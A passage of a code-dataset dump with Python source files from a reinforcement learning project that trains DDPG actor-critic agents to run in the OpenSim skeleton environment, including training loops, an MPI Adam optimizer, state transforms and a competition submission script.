random.randrange(2 ** 32 - 2)\n\n actor_lr = actor_learning_rate_decay_fn(episode)\n critic_lr = critic_learning_rate_decay_fn(episode)\n epsilon = min(args.initial_epsilon, max(args.final_epsilon, epsilon_decay_fn(episode)))\n\n episode_metrics = {\n \"value_loss\": 0.0,\n \"policy_loss\": 0.0,\n \"reward\": 0.0,\n \"step\": 0,\n \"epsilon\": epsilon\n }\n\n observation = env.reset(seed=seed, difficulty=args.difficulty)\n random_process.reset_states()\n done = False\n\n while not done:\n action = act_fn(observation, noise=epsilon*random_process.sample())\n next_observation, reward, done, _ = env.step(action)\n\n buffer.add(observation, action, reward, next_observation, done)\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n if len(buffer) >= args.train_steps:\n\n if args.prioritized_replay:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones,\n weights, batch_idxes) = \\\n buffer.sample(batch_size=args.batch_size, beta=beta_deacy_fn(episode))\n else:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones) = \\\n buffer.sample(batch_size=args.batch_size)\n weights, batch_idxes = np.ones_like(tr_rewards), None\n\n step_metrics, step_info = update_fn(\n tr_observations, tr_actions, tr_rewards,\n tr_next_observations, tr_dones,\n weights, actor_lr, critic_lr)\n\n if args.prioritized_replay:\n new_priorities = np.abs(step_info[\"td_error\"]) + 1e-6\n buffer.update_priorities(batch_idxes, new_priorities)\n\n for key, value in step_metrics.items():\n value = to_numpy(value)[0]\n episode_metrics[key] += value\n\n observation = next_observation\n\n episode += 1\n\n if episode_metrics[\"reward\"] > 15.0 * args.reward_scale \\\n and episode_metrics[\"reward\"] > best_reward.value:\n best_reward.value = episode_metrics[\"reward\"]\n logger.scalar_summary(\"best reward\", best_reward.value, episode)\n save_fn(episode)\n\n step += episode_metrics[\"step\"]\n elapsed_time = time.time() - start_time\n\n for key, value in episode_metrics.items():\n value = value if \"loss\" not in key else value / episode_metrics[\"step\"]\n logger.scalar_summary(key, value, episode)\n logger.scalar_summary(\n \"episode per minute\",\n episode / elapsed_time * 60,\n episode)\n logger.scalar_summary(\n \"step per second\",\n step / elapsed_time,\n episode)\n logger.scalar_summary(\"actor lr\", actor_lr, episode)\n logger.scalar_summary(\"critic lr\", critic_lr, episode)\n\n if episode % args.save_step == 0:\n save_fn(episode)\n\n if elapsed_time > 86400 * args.max_train_days:\n episode = args.max_episodes + 1\n\n save_fn(episode)\n\n raise KeyboardInterrupt\n\n\ndef train_single_thread(\n actor, critic, target_actor, target_critic, args, prepare_fn,\n global_episode, global_update_step, episodes_queue):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n _, update_fn, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n\n logger = Logger(args.logdir)\n\n buffer = create_buffer(args)\n\n if args.prioritized_replay:\n beta_deacy_fn = create_decay_fn(\n \"linear\",\n initial_value=args.prioritized_replay_beta0,\n final_value=1.0,\n max_step=args.max_update_steps)\n\n actor_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.actor_lr,\n final_value=args.actor_lr_end,\n max_step=args.max_update_steps)\n critic_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.critic_lr,\n final_value=args.critic_lr_end,\n max_step=args.max_update_steps)\n\n update_step = 0\n received_examples = 1 # just hack\n while global_episode.value < args.max_episodes * (args.num_threads - args.num_train_threads) \\\n and global_update_step.value < args.max_update_steps * args.num_train_threads:\n actor_lr = actor_learning_rate_decay_fn(update_step)\n critic_lr = critic_learning_rate_decay_fn(update_step)\n\n actor_lr = min(args.actor_lr, max(args.actor_lr_end, actor_lr))\n critic_lr = min(args.critic_lr, max(args.critic_lr_end, critic_lr))\n\n while True:\n try:\n replay = episodes_queue.get_nowait()\n for (observation, action, reward, next_observation, done) in replay:\n buffer.add(observation, action, reward, next_observation, done)\n received_examples += len(replay)\n except py_queue.Empty:\n break\n\n if len(buffer) >= args.train_steps:\n if args.prioritized_replay:\n beta = beta_deacy_fn(update_step)\n beta = min(1.0, max(args.prioritized_replay_beta0, beta))\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones,\n weights, batch_idxes) = \\\n buffer.sample(\n batch_size=args.batch_size,\n beta=beta)\n else:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones) = \\\n buffer.sample(batch_size=args.batch_size)\n weights, batch_idxes = np.ones_like(tr_rewards), None\n\n step_metrics, step_info = update_fn(\n tr_observations, tr_actions, tr_rewards,\n tr_next_observations, tr_dones,\n weights, actor_lr, critic_lr)\n\n update_step += 1\n global_update_step.value += 1\n\n if args.prioritized_replay:\n new_priorities = np.abs(step_info[\"td_error\"]) + 1e-6\n buffer.update_priorities(batch_idxes, new_priorities)\n\n for key, value in step_metrics.items():\n value = to_numpy(value)[0]\n logger.scalar_summary(key, value, update_step)\n\n logger.scalar_summary(\"actor lr\", actor_lr, update_step)\n logger.scalar_summary(\"critic lr\", critic_lr, update_step)\n\n if update_step % args.save_step == 0:\n save_fn(update_step)\n else:\n time.sleep(1)\n\n logger.scalar_summary(\"buffer size\", len(buffer), global_episode.value)\n logger.scalar_summary(\n \"updates per example\",\n update_step * args.batch_size / received_examples,\n global_episode.value)\n\n save_fn(update_step)\n\n raise KeyboardInterrupt\n\n\ndef play_single_thread(\n actor, critic, target_actor, target_critic, args, prepare_fn,\n global_episode, global_update_step, episodes_queue,\n best_reward):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n act_fn, _, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n\n logger = Logger(args.logdir)\n env = create_env(args)\n random_process = create_random_process(args)\n\n epsilon_cycle_len = random.randint(args.epsilon_cycle_len // 2, args.epsilon_cycle_len * 2)\n\n epsilon_decay_fn = create_decay_fn(\n \"cycle\",\n initial_value=args.initial_epsilon,\n final_value=args.final_epsilon,\n cycle_len=epsilon_cycle_len,\n num_cycles=args.max_episodes // epsilon_cycle_len)\n\n episode = 1\n step = 0\n start_time = time.time()\n while global_episode.value < args.max_episodes * (args.num_threads - args.num_train_threads) \\\n and global_update_step.value < args.max_update_steps * args.num_train_threads:\n if episode % 100 == 0:\n env = create_env(args)\n seed = random.randrange(2 ** 32 - 2)\n\n epsilon = min(args.initial_epsilon, max(args.final_epsilon, epsilon_decay_fn(episode)))\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n \"epsilon\": epsilon\n }\n\n observation = env.reset(seed=seed, difficulty=args.difficulty)\n random_process.reset_states()\n done = False\n\n replay = []\n while not done:\n action = act_fn(observation, noise=epsilon * random_process.sample())\n next_observation, reward, done, _ = env.step(action)\n\n replay.append((observation, action, reward, next_observation, done))\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n observation = next_observation\n\n episodes_queue.put(replay)\n\n episode += 1\n global_episode.value += 1\n\n if episode_metrics[\"reward\"] > best_reward.value:\n best_reward.value = episode_metrics[\"reward\"]\n logger.scalar_summary(\"best reward\", best_reward.value, episode)\n\n if episode_metrics[\"reward\"] > 15.0 * args.reward_scale:\n save_fn(episode)\n\n step += episode_metrics[\"step\"]\n elapsed_time = time.time() - start_time\n\n for key, value in episode_metrics.items():\n logger.scalar_summary(key, value, episode)\n logger.scalar_summary(\n \"episode per minute\",\n episode / elapsed_time * 60,\n episode)\n logger.scalar_summary(\n \"step per second\",\n step / elapsed_time,\n episode)\n\n if elapsed_time > 86400 * args.max_train_days:\n global_episode.value = args.max_episodes * (args.num_threads - args.num_train_threads) + 1\n\n raise KeyboardInterrupt\n"
},
{
"alpha_fraction": 0.5630457401275635,
"alphanum_fraction": 0.583304226398468,
"avg_line_length": 32.68235397338867,
"blob_id": "4e16126fce528ae1ec44f82f1d66f7a6b3285417",
"content_id": "70fb22fb0efdea24d751af1b98db7da338995386",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2863,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 85,
"path": "/baselines/baselines_common/mpi_adam.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport baselines.baselines_common.tf_util as U\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MpiAdam(object):\n def __init__(self, var_list, *,\n beta1=0.9, beta2=0.999, epsilon=1e-08,\n scale_grad_by_procs=True,\n comm=None):\n self.var_list = var_list\n self.beta1 = beta1\n self.beta2 = beta2\n self.epsilon = epsilon\n self.scale_grad_by_procs = scale_grad_by_procs\n size = sum(U.numel(v) for v in var_list)\n self.m = np.zeros(size, 'float32')\n self.v = np.zeros(size, 'float32')\n\n self.t = 0\n self.setfromflat = U.SetFromFlat(var_list)\n self.getflat = U.GetFlat(var_list)\n self.comm = MPI.COMM_WORLD if comm is None else comm\n\n def update(self, localg, stepsize):\n if self.t % 100 == 0:\n self.check_synced()\n localg = localg.astype('float32')\n globalg = np.zeros_like(localg)\n self.comm.Allreduce(localg, globalg, op=MPI.SUM)\n if self.scale_grad_by_procs:\n globalg /= self.comm.Get_size()\n\n self.t += 1\n a = stepsize * np.sqrt(1 - self.beta2 ** self.t) / (1 - self.beta1 ** self.t)\n self.m = self.beta1 * self.m + (1 - self.beta1) * globalg\n self.v = self.beta2 * self.v + (1 - self.beta2) * (globalg * globalg)\n step = (- a) * self.m / (np.sqrt(self.v) + self.epsilon)\n self.setfromflat(self.getflat() + step)\n\n def sync(self):\n theta = self.getflat()\n self.comm.Bcast(theta, root=0)\n self.setfromflat(theta)\n\n def check_synced(self):\n if self.comm.Get_rank() == 0: # this is root\n theta = self.getflat()\n self.comm.Bcast(theta, root=0)\n else:\n thetalocal = self.getflat()\n thetaroot = np.empty_like(thetalocal)\n self.comm.Bcast(thetaroot, root=0)\n assert (thetaroot == thetalocal).all(), (thetaroot, thetalocal)\n\n\[email protected]_session\ndef test_MpiAdam():\n np.random.seed(0)\n tf.set_random_seed(0)\n\n a = tf.Variable(np.random.randn(3).astype('float32'))\n b = tf.Variable(np.random.randn(2, 5).astype('float32'))\n loss = tf.reduce_sum(tf.square(a)) + tf.reduce_sum(tf.sin(b))\n\n stepsize = 1e-2\n update_op = tf.train.AdamOptimizer(stepsize).minimize(loss)\n do_update = U.function([], loss, updates=[update_op])\n\n tf.get_default_session().run(tf.global_variables_initializer())\n for i in range(10):\n print(i, do_update())\n\n tf.set_random_seed(0)\n tf.get_default_session().run(tf.global_variables_initializer())\n\n var_list = [a, b]\n lossandgrad = U.function([], [loss, U.flatgrad(loss, var_list)], updates=[update_op])\n adam = MpiAdam(var_list)\n\n for i in range(10):\n l, g = lossandgrad()\n adam.update(g, stepsize)\n print(i, l)\n"
},
{
"alpha_fraction": 0.5336737632751465,
"alphanum_fraction": 0.5396684408187866,
"avg_line_length": 39.21428680419922,
"blob_id": "0485b2acb5383803693d3bb0c4efaea7c08a8c3d",
"content_id": "746f012a3ad9c1f319b4b09e0bf26fc0d9ee8196",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13512,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 336,
"path": "/common/state_transform.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nfrom collections import OrderedDict\n\n\ndef get_state_names(all=False, obst=False):\n names = ['pelvis_' + n for n in ('rot', 'x', 'y')]\n names += ['pelvis_vel_' + n for n in ('rot', 'x', 'y')]\n names += ['hip_right', 'knee_right', 'ankle_right', 'hip_left', 'knee_left', 'ankle_left']\n names += ['hip_right_vel', 'knee_right_vel', 'ankle_right_vel', 'hip_left_vel', 'knee_left_vel', 'ankle_left_vel']\n names += ['mass_x', 'mass_y']\n names += ['mass_x_vel', 'mass_y_vel']\n\n if all:\n names += [b + '_' + i for b in ['head', 'pelvis2', 'torso', 'toes_left',\n 'toes_right', 'talus_left', 'talus_right'] for i in\n ['x', 'y']]\n else:\n names += [b + '_' + i for b in ['head', 'torso', 'toes_left', 'toes_right',\n 'talus_left', 'talus_right'] for i in\n ['x', 'y']]\n\n names += ['muscle_left', 'muscle_right']\n if obst:\n names += ['obst_dist', 'obst_y', 'obst_r']\n return names\n\n\ndef get_names_to_center(centr):\n if centr == 'pelvis':\n pelvis_or_mass = 'mass'\n elif centr == 'mass':\n pelvis_or_mass = 'pelvis'\n else:\n raise ValueError('centr should be in [mass or pelvis], not {}'.format(centr))\n return [b + '_x' for b in ['head', pelvis_or_mass, 'torso', 'toes_left',\n 'toes_right', 'talus_left', 'talus_right']]\n\n\ndef get_bodies_names():\n return [b + '_' + i for b in ['head', 'torso', 'toes_left', 'toes_right', 'talus_left', 'talus_right']\n for i in ['x', 'y']]\n\n\ndef get_names_obstacles():\n return ['toes_left', 'toes_right', 'talus_left', 'talus_right']\n\n\ndef calculate_velocity(cur, prev):\n if prev is None:\n return np.zeros_like(cur)\n return 100.*(cur - prev)\n\n\ndef _get_pattern_idxs(lst, pattern):\n idxs = [i for i, x in enumerate(lst) if pattern in x]\n return idxs\n\n\nclass State(object):\n def __init__(self, obstacles_mode='bodies_dist', obst_grid_dist=1,\n grid_points=100, predict_bodies=True, add_step=True, osb_first=False):\n assert obstacles_mode in ['exclude', 'grid', 'bodies_dist', 'standard']\n\n self.state_idxs = [i for i, n in enumerate(get_state_names(True, True)) if n not in ['pelvis2_x', 'pelvis2_y']]\n self.state_names = get_state_names()\n self.step = 0\n self.add_step = add_step\n self.osb_first = osb_first\n self.obstacles_mode = obstacles_mode\n self.obstacles = OrderedDict()\n\n self.obst_names = []\n if obstacles_mode == 'standard':\n self.obst_names = ['obst_dist', 'obst_y', 'obst_r']\n elif obstacles_mode == 'grid':\n self.obst_names = ['obst_grid_{}'.format(i) for i in range(grid_points)]\n self.obst_grid_dist = obst_grid_dist\n self.obst_grid_points = grid_points\n self.obst_grid_size = obst_grid_dist * 2 / grid_points\n elif obstacles_mode == 'bodies_dist':\n self._obst_names = get_names_obstacles()\n for i in range(3):\n for n in self._obst_names:\n self.obst_names.append('{}_{}_obst_x_start'.format(n, i))\n self.obst_names.append('{}_{}_obst_x_end'.format(n, i))\n self.obst_names.append('{}_{}_obst_y'.format(n, i))\n self.obst_names.append('is_obstacle')\n\n if self.add_step:\n self.state_names.append('step')\n\n self.predict_bodies = predict_bodies\n self.bodies_idxs_x = [self.state_names.index(n) for n in get_bodies_names() if n.endswith('_x')]\n self.bodies_idxs_y = [self.state_names.index(n) for n in get_bodies_names() if n.endswith('_y')]\n self.bodies_idxs = self.bodies_idxs_x + self.bodies_idxs_y\n self.mass_x_idx = self.state_names.index('mass_x')\n self.mass_y_idx = self.state_names.index('mass_y')\n\n self.state_names_out = self.state_names\n self._set_left_right()\n\n def _set_left_right(self):\n self.left_idxs = _get_pattern_idxs(self.state_names, '_left')\n self.right_idxs = _get_pattern_idxs(self.state_names, '_right')\n\n def reset(self):\n self.step = 0\n self.prev_orig = None\n self.prev_pred = None\n self.obstacles = OrderedDict()\n\n def _predict_bodies(self, state):\n state = np.copy(state)\n\n if self.step > 0:\n\n def update_bodies(cur, prev_orig, prev_pred, d):\n flt = cur == prev_orig\n cur[flt] = prev_pred[flt] + d\n\n # does not matter orig or pred\n dx = state[self.mass_x_idx] - self.prev_orig[self.mass_x_idx]\n dy = state[self.mass_y_idx] - self.prev_orig[self.mass_y_idx]\n\n cur_bodies_x = state[self.bodies_idxs_x]\n cur_bodies_y = state[self.bodies_idxs_y]\n\n # need for filter\n prev_orig_bodies_x = self.prev_orig[self.bodies_idxs_x]\n prev_orig_bodies_y = self.prev_orig[self.bodies_idxs_y]\n\n # need for updating\n prev_pred_bodies_x = self.prev_pred[self.bodies_idxs_x]\n prev_pred_bodies_y = self.prev_pred[self.bodies_idxs_y]\n\n update_bodies(cur_bodies_x, prev_orig_bodies_x, prev_pred_bodies_x, dx)\n update_bodies(cur_bodies_y, prev_orig_bodies_y, prev_pred_bodies_y, dy)\n\n state[self.bodies_idxs_x] = cur_bodies_x\n state[self.bodies_idxs_y] = cur_bodies_y\n return state\n\n def _add_obstacle(self, state):\n pelvis_x = state[1]\n obstacle_x = state[-3]\n\n if obstacle_x != 100:\n obstacle_x += pelvis_x\n if round(obstacle_x, 5) not in self.obstacles:\n self.obstacles[round(obstacle_x, 5)] = [obstacle_x, state[-2], state[-1]]\n #print('obstacles {}, step {}'.format(self.obstacles.keys(), self.step))\n if len(self.obstacles) > 3:\n Warning('more than 3 obstacles')\n\n def _get_obstacle_state_reward(self, state):\n is_obst = float(state[-3] != 100)\n\n if self.obstacles_mode == 'exclude':\n return [is_obst], 0.\n elif self.obstacles_mode == 'standard':\n if not is_obst:\n return [-1., 0., 0., is_obst], 0.\n obst_features = np.clip(state[-3:], -10., 10.)\n return np.append(obst_features, is_obst), 0.\n elif self.obstacles_mode == 'gird':\n mass_x = state[self.state_names.index('mass_x')]\n obst_grid = np.zeros(self.obst_grid_points)\n for k, v in self.obstacles.iteritems():\n obst_x, obst_y, obst_r = v\n obst_h = obst_y + obst_r\n obst_left = int(np.ceil((obst_x - mass_x - obst_r) / self.obst_grid_size) + self.obst_grid_points // 2)\n obst_right = int(np.ceil((obst_x - mass_x + obst_r) / self.obst_grid_size) + self.obst_grid_points // 2)\n obst_left = max(obst_left, 0)\n obst_right = max(obst_right, -1)\n obst_grid[obst_left:obst_right + 1] = obst_h\n obst_features = np.append(obst_grid, is_obst)\n return obst_features, 0\n else:\n obst_state = []\n obst_reward = 0\n for i in range(3):\n if i >= len(self.obstacles):\n for n in self._obst_names:\n body_y = state[self.state_names.index(n + '_y')]\n obst_state.extend([10, 10, body_y])\n else:\n v = self.obstacles.values()[i]\n obst_x, obst_y, obst_r = v\n obst_h = obst_y + obst_r\n obst_x_start = obst_x - obst_r\n obst_x_end = obst_x + obst_r\n for n in self._obst_names:\n body_x = state[self.state_names.index(n + '_x')]\n body_y = state[self.state_names.index(n + '_y')]\n obst_state.append(obst_x_start - body_x)\n obst_state.append(obst_x_end - body_x)\n obst_state.append(body_y - obst_h)\n if obst_reward >= 0 and body_x >= (obst_x_start - obst_r/2) \\\n and (body_x <= obst_x_end+obst_r/2) and (obst_h + obst_r/2) >= body_y:\n obst_reward = -0.5\n obst_state.append(is_obst)\n return np.asarray(obst_state), obst_reward\n\n def process(self, state):\n state = np.asarray(state)\n state = state[self.state_idxs]\n\n if self.osb_first and self.step == 0:\n state[-3:] = [100, 0, 0]\n\n self._add_obstacle(state)\n obst_state, obst_reward = self._get_obstacle_state_reward(state)\n state_orig = state[:-3]\n\n if self.add_step:\n state_orig = np.append(state_orig, 1. * self.step / 1000)\n\n if self.predict_bodies:\n state = self._predict_bodies(state_orig)\n else:\n state = state_orig\n\n self.step += 1\n self.prev_orig = state_orig\n self.prev_pred = np.copy(state)\n\n return (state, obst_state), obst_reward\n\n def flip_state(self, state, copy=True):\n assert np.ndim(state) == 1\n state = np.asarray(state)\n state = self.flip_states(state.reshape(1, -1), copy)\n return state.ravel()\n\n def flip_states(self, states, copy=True):\n assert np.ndim(states) == 2\n states = np.asarray(states)\n if copy:\n states = states.copy()\n left = states[:, self.left_idxs]\n right = states[:, self.right_idxs]\n states[:, self.left_idxs] = right\n states[:, self.right_idxs] = left\n return states\n\n @property\n def state_size(self):\n return len(self.state_names_out) + len(self.obst_names)\n\n\nclass StateVel(State):\n def __init__(self, vel_states=get_bodies_names(), obstacles_mode='bodies_dist',\n add_step=True, predict_bodies=True, osb_first=False):\n super(StateVel, self).__init__(obstacles_mode=obstacles_mode,\n predict_bodies=predict_bodies,\n add_step=add_step,\n osb_first=osb_first)\n self.vel_idxs = [self.state_names.index(k) for k in vel_states]\n self.prev_vals = None\n self.state_names += [n + '_vel' for n in vel_states]\n self.state_names_out = self.state_names\n # left right idxs\n self._set_left_right()\n\n def reset(self):\n super(StateVel, self).reset()\n self.prev_vals = None\n\n def process(self, state):\n (state, obst_state), obst_reward = super(StateVel, self).process(state)\n cur_vals = state[self.vel_idxs]\n vel = calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n state = np.concatenate((state, vel, obst_state))\n return state, obst_reward\n\n\nclass StateVelCentr(State):\n def __init__(self, centr_state='pelvis_x', vel_states=get_bodies_names(),\n states_to_center=get_names_to_center('pelvis'),\n vel_before_centr=True, obstacles_mode='bodies_dist',\n exclude_centr=False, predict_bodies=True,\n add_step=True, osb_first=False):\n super(StateVelCentr, self).__init__(obstacles_mode=obstacles_mode,\n predict_bodies=predict_bodies,\n add_step=add_step,\n osb_first=osb_first)\n\n # center\n self.centr_idx = self.state_names.index(centr_state)\n self.states_to_center = [self.state_names.index(k) for k in states_to_center]\n # velocities\n self.prev_vals = None\n self.vel_idxs = [self.state_names.index(k) for k in vel_states]\n self.vel_before_centr = vel_before_centr\n self.state_names += [n + '_vel' for n in vel_states]\n self.exclude_centr = exclude_centr\n\n if self.exclude_centr:\n self.state_names_out = self.state_names[:max(0, self.centr_idx)] + \\\n self.state_names[self.centr_idx + 1:]\n else:\n self.state_names_out = self.state_names\n\n # left right idxs\n self._set_left_right()\n\n def _set_left_right(self):\n state_names = self.state_names_out\n self.left_idxs = _get_pattern_idxs(state_names, '_left')\n self.right_idxs = _get_pattern_idxs(state_names, '_right')\n\n def reset(self):\n super(StateVelCentr, self).reset()\n self.prev_vals = None\n\n def process(self, state):\n (state, obst_state), obst_reward = super(StateVelCentr, self).process(state)\n\n if self.vel_before_centr:\n cur_vals = state[self.vel_idxs]\n vel = calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n state[self.states_to_center] -= state[self.centr_idx]\n else:\n state[self.states_to_center] -= state[self.centr_idx]\n cur_vals = state[self.vel_idxs]\n vel = calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n\n if self.exclude_centr:\n state = np.concatenate([state[:max(0, self.centr_idx)], state[self.centr_idx+1:]])\n\n state = np.concatenate((state, vel, obst_state))\n return state, obst_reward\n"
},
{
"alpha_fraction": 0.5821986198425293,
"alphanum_fraction": 0.5848555564880371,
"avg_line_length": 32.4555549621582,
"blob_id": "961f316e55214fa653a4c0180f87c062271d85bb",
"content_id": "b80e4724775d2f3ef408ee9015d557f064769822",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3011,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 90,
"path": "/ddpg/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom common.nets import LinearNet\nfrom common.modules.NoisyLinear import NoisyLinear\n\n\ndef fanin_init(size, fanin=None):\n fanin = fanin or size[0]\n v = 1. / np.sqrt(fanin)\n return torch.Tensor(size).uniform_(-v, v)\n\n\nclass Actor(nn.Module):\n def __init__(self, n_observation, n_action,\n layers, activation=torch.nn.ELU,\n layer_norm=False,\n parameters_noise=False, parameters_noise_factorised=False,\n last_activation=torch.nn.Tanh, init_w=3e-3):\n super(Actor, self).__init__()\n\n if parameters_noise:\n def linear_layer(x_in, x_out):\n return NoisyLinear(x_in, x_out, factorised=parameters_noise_factorised)\n else:\n linear_layer = nn.Linear\n\n self.feature_net = LinearNet(\n layers=[n_observation] + layers,\n activation=activation,\n layer_norm=layer_norm,\n linear_layer=linear_layer)\n self.policy_net = LinearNet(\n layers=[self.feature_net.output_shape, n_action],\n activation=last_activation,\n layer_norm=False\n )\n self.init_weights(init_w)\n\n def init_weights(self, init_w):\n for layer in self.feature_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data = fanin_init(layer.weight.data.size())\n\n for layer in self.policy_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data.uniform_(-init_w, init_w)\n\n def forward(self, observation):\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n return x\n\n\nclass Critic(nn.Module):\n def __init__(self, n_observation, n_action,\n layers, activation=torch.nn.ELU,\n layer_norm=False,\n parameters_noise=False, parameters_noise_factorised=False,\n init_w=3e-3):\n super(Critic, self).__init__()\n\n if parameters_noise:\n def linear_layer(x_in, x_out):\n return NoisyLinear(x_in, x_out, factorised=parameters_noise_factorised)\n else:\n linear_layer = nn.Linear\n\n self.feature_net = LinearNet(\n layers=[n_observation + n_action] + layers,\n activation=activation,\n layer_norm=layer_norm,\n linear_layer=linear_layer)\n self.value_net = nn.Linear(self.feature_net.output_shape, 1)\n self.init_weights(init_w)\n\n def init_weights(self, init_w):\n for layer in self.feature_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data = fanin_init(layer.weight.data.size())\n\n self.value_net.weight.data.uniform_(-init_w, init_w)\n\n def forward(self, observation, action):\n x = torch.cat((observation, action), dim=1)\n x = self.feature_net.forward(x)\n x = self.value_net.forward(x)\n return x\n"
},
{
"alpha_fraction": 0.6867291331291199,
"alphanum_fraction": 0.6916625499725342,
"avg_line_length": 27.957143783569336,
"blob_id": "913591fdfab6facf7937ac2b9b907970831ed387",
"content_id": "2b9ebc352e51f639a057080e1264c83b955ed0b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2027,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 70,
"path": "/ddpg/debug.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport torch\nimport copy\nfrom multiprocessing import Value\n\nfrom common.misc_util import str2params, create_if_need\nfrom common.env_wrappers import create_env\nfrom common.torch_util import activations, hard_update\n\nfrom ddpg.model import create_model, create_act_update_fns, train_multi_thread\nfrom ddpg.train import parse_args\n\n\ndef debug(args, model_fn, act_update_fns, multi_thread):\n create_if_need(args.logdir)\n env = create_env(args)\n\n if args.flip_state_action and hasattr(env, \"state_transform\"):\n args.flip_states = env.state_transform.flip_states\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n\n if args.restore_actor_from is not None:\n actor.load_state_dict(torch.load(args.restore_actor_from))\n if args.restore_critic_from is not None:\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n actor.train()\n critic.train()\n actor.share_memory()\n critic.share_memory()\n\n target_actor = copy.deepcopy(actor)\n target_critic = copy.deepcopy(critic)\n\n hard_update(target_actor, actor)\n hard_update(target_critic, critic)\n\n target_actor.train()\n critic.train()\n target_actor.share_memory()\n target_critic.share_memory()\n\n _, _, save_fn = act_update_fns(actor, critic, target_actor, target_critic, args)\n\n args.thread = 0\n best_reward = Value(\"f\", 0.0)\n multi_thread(actor, critic, target_actor, target_critic, args, act_update_fns, best_reward)\n\n save_fn()\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n debug(\n args,\n create_model,\n create_act_update_fns,\n train_multi_thread)\n"
},
{
"alpha_fraction": 0.6219819784164429,
"alphanum_fraction": 0.6455855965614319,
"avg_line_length": 28.838708877563477,
"blob_id": "72e1cb5bccc87b9dbdbece50fa20ba1e8951094a",
"content_id": "e071ae713e49fd091221c4f3410ecf75b28c82fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5550,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 186,
"path": "/ddpg/submit.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport json\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom pprint import pprint\n\nfrom osim.env import RunEnv\nfrom osim.http.client import Client\n\nfrom common.misc_util import boolean_flag, query_yes_no\nfrom common.env_wrappers import create_observation_handler, create_action_handler, create_env\n\nfrom ddpg.train import str2params, activations\nfrom ddpg.model import create_model, create_act_update_fns\n\n\nREMOTE_BASE = 'http://grader.crowdai.org:1729'\nACTION_SHAPE = 18\nSEEDS = [\n 3834825972, 3049289152, 3538742899, 2904257823, 4011088434,\n 2684066875, 781202090, 1691535473, 898088606, 1301477286\n]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n parser.add_argument('--restore-actor-from', type=str, default=None)\n parser.add_argument('--restore-critic-from', type=str, default=None)\n\n parser.add_argument('--max-obstacles', type=int, default=3)\n parser.add_argument('--num-episodes', type=int, default=1)\n parser.add_argument('--token', type=str, default=None)\n\n boolean_flag(parser, \"visualize\", default=False)\n boolean_flag(parser, \"submit\", default=False)\n\n return parser.parse_args()\n\n\ndef restore_args(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n unwanted = [\n \"max_obstacles\",\n \"restore_args_from\",\n \"restore_actor_from\",\n \"restore_critic_from\"\n ]\n\n for unwanted_key in unwanted:\n value = params.pop(unwanted_key, None)\n if value is not None:\n del value\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n\n\ndef submit(actor, critic, args, act_update_fn):\n act_fn, _, _ = act_update_fn(actor, critic, None, None, args)\n\n client = Client(REMOTE_BASE)\n\n all_episode_metrics = []\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n 